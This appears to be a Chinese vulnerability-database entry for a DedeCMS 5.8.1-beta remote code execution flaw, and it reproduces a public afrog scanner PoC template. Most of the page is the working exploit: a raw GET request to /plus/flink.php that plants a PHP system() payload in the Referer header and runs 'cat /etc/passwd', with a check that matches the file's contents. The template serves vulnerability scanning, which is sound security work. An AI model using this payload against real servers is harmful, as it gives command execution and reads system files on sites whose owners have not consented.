dedecms-rce: DedeCMS 5.8.1-beta - Remote Code Execution

日期: 2025-09-01 | 影响软件: dedecms | POC: 已公开

漏洞描述

DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials. app="DedeCMS"

PoC代码[已公开]

id: dedecms-rce

info:
  name: DedeCMS 5.8.1-beta - Remote Code Execution
  author: ritikchaddha
  severity: critical
  verified: false
  description: |
    DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.
    app="DedeCMS"
  reference:
    - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
    - https://sectime.top/post/1d114771.html

set:
  hostname: request.url.host
rules:
  r0:
    # request:
    #   method: GET
    #   path: /plus/flink.php?dopost=save&c=cat%20/etc/passwd
    #   headers:
    #     Referer: '<?php "system"($c);die;/*ref'
    request:
      raw: |
        GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
        Host: {{hostname}}
        Referer: <?php "system"($c);die;/*ref
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dedecms-rce.yaml

相关漏洞推荐